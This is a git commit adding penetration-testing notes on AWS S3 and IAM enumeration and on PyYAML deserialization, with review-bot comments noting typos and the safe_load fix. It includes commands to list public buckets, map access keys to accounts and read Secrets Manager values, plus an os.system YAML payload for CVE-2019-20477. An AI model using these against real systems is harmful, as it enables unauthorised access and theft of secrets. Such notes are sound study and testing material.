yaml deserialization, s3 buckets enum
This commit is contained in:
parent
c9f70905cf
commit
615effb8a0
@ -0,0 +1,84 @@
# AWS S3 Enumeration

## Usage

* [Regions](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-segions)
* `--region`
### Simple Storage Service (S3)
* [S3](https://aws.amazon.com/s3/)
* Methods of access control are as follows
* [Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-policies.html)
* [S3 ACL](https://docs.aws.amazon.com/AmazonS3/latest/userguide/managing-acls.html)

* Scheme is
```sh
http://<bucketname>.s3.amazonaws.com/file.name
```
or
```sh
http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
```

* __List content of public bucket via__
```sh
aws s3 ls s3://<bucketname>/ --no-sign-request
```
* Download via `curl`, `wget` or `s3` cli via
```sh
aws s3 cp s3://<bucketname>/foo_public.xml . --no-sign-request
```

#### ACL
* `Anyone`, just `curl`
* `AuthenticatedUsers`, `s3` cli with aws key

## IAM
* Not necessarily used by s3
* Access key ID, starts with `AKIA` + 20 chars
* Secret access key
* Session token, `ASIA` + sessionToken

* Add credentials to profile via
```sh
aws configure --profile PROFILENAME
```
* Config and credentials is stored at `~/.aws`
* Sanity test profile via
```sh
aws s3 ls --profile PROFILENAME
```
* Find account ID to an access key
```sh
aws sts get-access-key-info --access-key-id AKIAEXAMPLE
```
* Find username to an access key
```sh
aws sts get-caller-identity --profile PROFILENAME
```
* Listing EC2 instances of an account
```sh
aws ec2 describe-instances --output text --profile PROFILENAME
```
* aws ec2 describe-instances --output text --profile PROFILENAME
```sh
aws ec2 describe-instances --output text --profile PROFILENAME
```
* In another region
```sh
aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME
```

### AWS ARN
* Unique ID is create via the following scheme
```sh
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
```

### Secrets

```sh
aws secretsmanager help
aws secretsmanager list-secrets
ws secretsmanager get-secret-value --secret-id <Name> --region <region>
```

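Review bot: three things in this file will trip a reader who copies it: the Regions link anchor `#concepts-available-segions` looks like a typo for `regions` and will not jump to the section; the bullet `* aws ec2 describe-instances --output text --profile PROFILENAME` and the code block under it repeat the preceding "Listing EC2 instances of an account" entry verbatim and should be dropped; and the last Secrets command reads `ws secretsmanager get-secret-value ...`, missing its leading `a`, so it will not run as written. Smaller points: "Config and credentials is stored" should be "are stored" and "Unique ID is create via" should be "is created via"; the "Session token" bullet conflates two values, since `ASIA` is the prefix of the temporary access key ID that is issued together with a session token, not of the token itself; the "Find account ID to an access key" example (`aws sts get-access-key-info`) is still a signed STS call and needs a `--profile` like the `get-caller-identity` example next to it; and the two Scheme URLs use `http://`, where `https://` should be shown so that bucket listing and downloads are not demonstrated over plaintext.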
@ -0,0 +1,13 @@
# YAML Deserialization

* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477)
* RCE via Yaml execution by Python

* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)

## Usage

* Example Payload insid foo.yaml gets executed via Python
```sh
!!python/object/apply:os.system ["id"]
```
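Review bot: the Usage bullet does not say which load path honours the tag, which is the one fact a reader needs to judge exposure: `!!python/object/apply` is only resolved by `yaml.load()` with the unsafe default or full loader (the FullLoader behaviour the linked CVE write-up covers), while `yaml.safe_load()` rejects it, so a line naming `safe_load` as the fix belongs next to the payload. Also, the fence is tagged `sh` but its content is YAML and should be tagged `yaml`, and "insid" should read "inside".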